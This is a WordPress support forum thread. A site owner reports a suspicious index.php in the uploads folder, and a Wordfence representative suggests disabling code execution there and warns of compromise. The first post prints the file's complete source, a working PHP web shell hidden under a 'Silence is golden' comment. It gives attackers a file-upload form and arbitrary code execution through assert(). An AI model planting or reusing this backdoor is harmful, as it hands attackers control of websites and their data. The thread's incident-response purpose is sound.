How to disable code execution for upload folder

  • unique5555

    (@unique5555)


    9 years, 8 months ago

    Something in my site is causing/allowing a file called index.php to write to my upload folder. The file reads:
    <?php if(@isset($_GET[bots])){echo ‘<form action=”” method=”post” enctype=”multipart/form-data” name=”silence” id=”silence”>’;echo ‘<input type=”file” name=”file”><input name=”golden” type=”submit” id=”golden” value=”Done”></form>’;if($_POST[‘golden’]==”Done”){if(@copy($_FILES[‘file’][‘tmp_name’],$_FILES[‘file’][‘name’])){echo’+’;}else{echo’-‘;}}}elseif(isset($_REQUEST[‘bot’]))assert(stripslashes($_REQUEST[bot]));else exit;
    // Silence is golden.

    I’ve been told that there should be an option in Wordfence that will allow me to disable code execution for upload directory. Unfortunately, I cannot find it and because I’m a designer not a coding expert, I am unable to write my own instruction. Can anyone help?

    https://wordpress.org/plugins/wordfence/

Viewing 1 replies (of 1 total)
  • wflandon

    (@wflandon)

    9 years, 8 months ago

    Hi unique5555,

    Yes there is an option toward the bottom of the Wordfence Options page called Disable Code Execution for Uploads directory.

    Where is the referenced index.php file located? Your site may have been compromised. Chances are the only part of the code that should actually be there is this:

    <?php
// Silence is golden.

    So you may need to take further action. Let me know what you find out.

Viewing 1 replies (of 1 total)

The topic ‘How to disable code execution for upload folder’ is closed to new replies.